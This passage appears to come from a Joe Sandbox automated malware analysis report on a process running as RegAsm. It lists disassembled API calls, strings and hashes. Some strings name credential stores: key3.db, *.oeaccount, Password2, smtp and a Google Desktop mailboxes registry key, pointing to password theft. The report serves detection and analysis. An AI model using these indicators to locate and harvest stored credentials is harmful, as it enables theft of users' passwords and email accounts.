                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                                        • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                      • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                      • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                                                      • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1189762176-0
                                                                                                                                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                                        • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                                                        • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                        • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                        • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                      • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2374668499-0
                                                                                                                                                                                                                      • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                                                      • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                                                      • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                      • API String ID: 3699762281-1998499579
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                                                      • free.MSVCRT ref: 00409B00
                                                                                                                                                                                                                        • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2775283111-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                                                        • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                                                        • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                                                        • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                                      • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                      • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                                      • API String ID: 885266447-2471937615
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                                                        • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                                                        • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: Ul@$key3.db
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                                      • String ID: smtp
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                      • String ID: S_@$l
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                      • String ID: C^@$X$ini
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                      • API String ID: 275601554-2167791130
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                      • API String ID: 534179979-1506664499
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_mbscat
                                                                                                                                                                                                                      • String ID: 3CD
                                                                                                                                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                      • String ID: Password2
                                                                                                                                                                                                                      • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: rows deleted
                                                                                                                                                                                                                      • API String ID: 2221118986-571615504
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
